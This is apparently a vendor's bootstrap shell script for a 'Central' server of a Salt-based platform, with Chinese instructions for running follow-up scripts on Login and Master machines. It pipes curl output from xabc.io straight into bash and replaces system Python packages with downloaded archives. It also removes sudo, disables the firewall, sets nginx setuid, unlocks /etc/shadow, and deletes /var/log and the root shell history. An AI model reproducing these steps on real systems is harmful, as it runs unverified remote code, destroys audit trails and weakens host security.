c rm -f /etc/motd hostnamectl --static set-hostname central-75.101.220.230; yum -y update yum -y install epel-release yum -y install wget gcc gcc-c++ make vim pcre-devel libffi-devel openssl-devel python-devel libevent-devel postgresql-devel readline-devel perl-ExtUtils-Embed iptables iptables-services inotify-tools bzip2 unzip rsync psmisc yum -y install bash-completion yum -y install python-pip yum -y install chrony yum -y erase sudo yum clean all curl -s xabc.io/awscli|bash timedatectl set-timezone Asia/Shanghai wget -t 3 https://s.xabcloud.com/matrix/xabc.sh -O /etc/profile.d/xabc.sh chmod 644 /etc/profile.d/xabc.sh wget -t 3 https://s.xabcstack.com/files/vim.tgz -O -|tar xzf - -C ~ [ -d /root/.pip ]||mkdir -p /root/.pip wget -t 3 https://s.xabcstack.com/files/pip.conf -O /root/.pip/pip.conf pip install pip==9.0.3 pip install --upgrade setuptools==30.1.0 pip install --upgrade Cython redis pyOpenSSL pip install functions pip install tornado==5.1.1 pip install redis pip install tornadio2 pip install tornado_jinja2 pip install sqlalchemy_utils pip install psycopg2-binary pip install Pillow pip install paramiko pip install sqlalchemy pip install influxdb pip install futures pip install flask pip install mako pip install ujson mv /usr/lib/python2.7/site-packages /usr/lib/python2.7/site-packages.bk wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/matrix/site-packages.tgz -O -|tar xzf - -C /usr/lib/python2.7 yum -y install https://repo.saltstack.com/py3/redhat/salt-py3-repo-latest.el7.noarch.rpm yum -y clean expire-cache yum -y install salt-master salt-minion salt-api salt-ssh pip3 install redis flask cryptography pyinotify influxdb salt-pepper chattr -ai /etc/salt/minion_id &>/dev/null echo `hostname` > /etc/salt/minion_id systemctl enable salt-master.service systemctl enable salt-api.service systemctl enable chrony systemctl disable firewalld.service &>/dev/null wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/matrix/master -O /etc/salt/master [ -d /srv/zero/0 ]||mkdir -p /srv/zero/0 [ -d /srv/zero/1 ]||mkdir -p /srv/zero/1 [ -d /srv/zero/2 ]||mkdir -p /srv/zero/2 wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/matrix/node.tgz -O -|tar xzf - -C /srv/zero/1 ln -fs /srv/zero/1/node/bin/npm /usr/bin/npm ln -fs /srv/zero/1/node/bin/node /usr/bin/node #wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/matrix/matrix.tgz -O -|tar xzf - -C /srv/zero/1 [ -d /srv/salt/user ]||mkdir -p /srv/salt/user [ -d /srv/zero ]||mkdir -p /srv/zero wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/matrix/O.tgz -O -|tar xzf - -C /srv/zero/0 wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/matrix/P.tgz -O -|tar xzf - -C /srv/zero/1 wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/matrix/R.tgz -O -|tar xzf - -C /srv/zero/2 wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/matrix/grafana.tgz -O -|tar xzf - -C /srv/zero/1 chmod 100 /srv/zero/2/redis/bin/* ln -fs /srv/zero/2/redis/bin/redis-cli /usr/local/bin/ id -u nobody &>/dev/null||useradd nobody -r -s /bin/false groupadd -f nobody &>/dev/null chown root.nobody /srv/zero/0/openresty/nginx/sbin/nginx chmod +xs /srv/zero/0/openresty/nginx/sbin/nginx chattr -ai /etc/{passwd,shadow,group,gshadow,services} yum install -y postgresql-server service postgresql initdb service postgresql start service salt-master start systemctl enable postgresql.service [ -e /etc/ssh/ssh_host_dsa_key ]||ssh-keygen -q -t dsa -P '' -f /etc/ssh/ssh_host_dsa_key chmod 755 /etc/rc.d/rc.local systemctl disable salt-minion.service #wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/matrix/build.tgz -O -|tar xzf - -C /srv/salt rm -fr /var/log /var/cache/salt/minion /root/.bash_history IP=${SSH_CONNECTION% *};IP=${IP##* };[ -n "$IP" ]||IP=$(ip -o -f inet addr|grep -v 'lo '|grep -Po '(?<=inet ).*(?=\/)'|awk '/^10\.|^172\.|^192\.|^100\./'|head -1) REGION=$(curl -s -m 5 http://ip-api.com/line/75.101.220.230?fields=city);[ -n "$REGION" ]||REGION="Shanghai" printf "\033[1;32;40m%s\033[0m\n" "Login 和 Central 机器在同一个内网请在 Login 机器执行 # curl -s xabc.io/l-$IP-$REGION|bash 继续完成对 Login 的基础部署" printf "\033[1;32;40m%s\033[0m\n-----------------\n" "Master 和 Central 机器在同一个内网请在 Master 机器执行 # curl -s xabc.io/m-$IP-$REGION|bash 继续完成对 Master 的基础部署" printf "\033[1;32;40m%s\033[0m\n" "Login 和 Central 机器不在同一内网请在 Login 机器执行 # curl -s xabc.io/l-75.101.220.230-$REGION|bash 继续完成对 Login 的基础部署" printf "\033[1;32;40m%s\033[0m\n" "Master 和 Central 机器不在同一内网请在 Master 机器执行 # curl -s xabc.io/m-75.101.220.230-$REGION|bash 继续完成对 Master 的基础部署" printf "\033[1;32;31m%s\033[0m\n" "特别说明 $REGION 这个字段代表网络区域信息,可根据实际情况改成自己机器所在区域标识信息,同一网络节点内login,master机器,其region标识信息一致,如Beijing,必须与/srv/pillar/central.sls 里面 region 定义一致"
p 75.101.220.230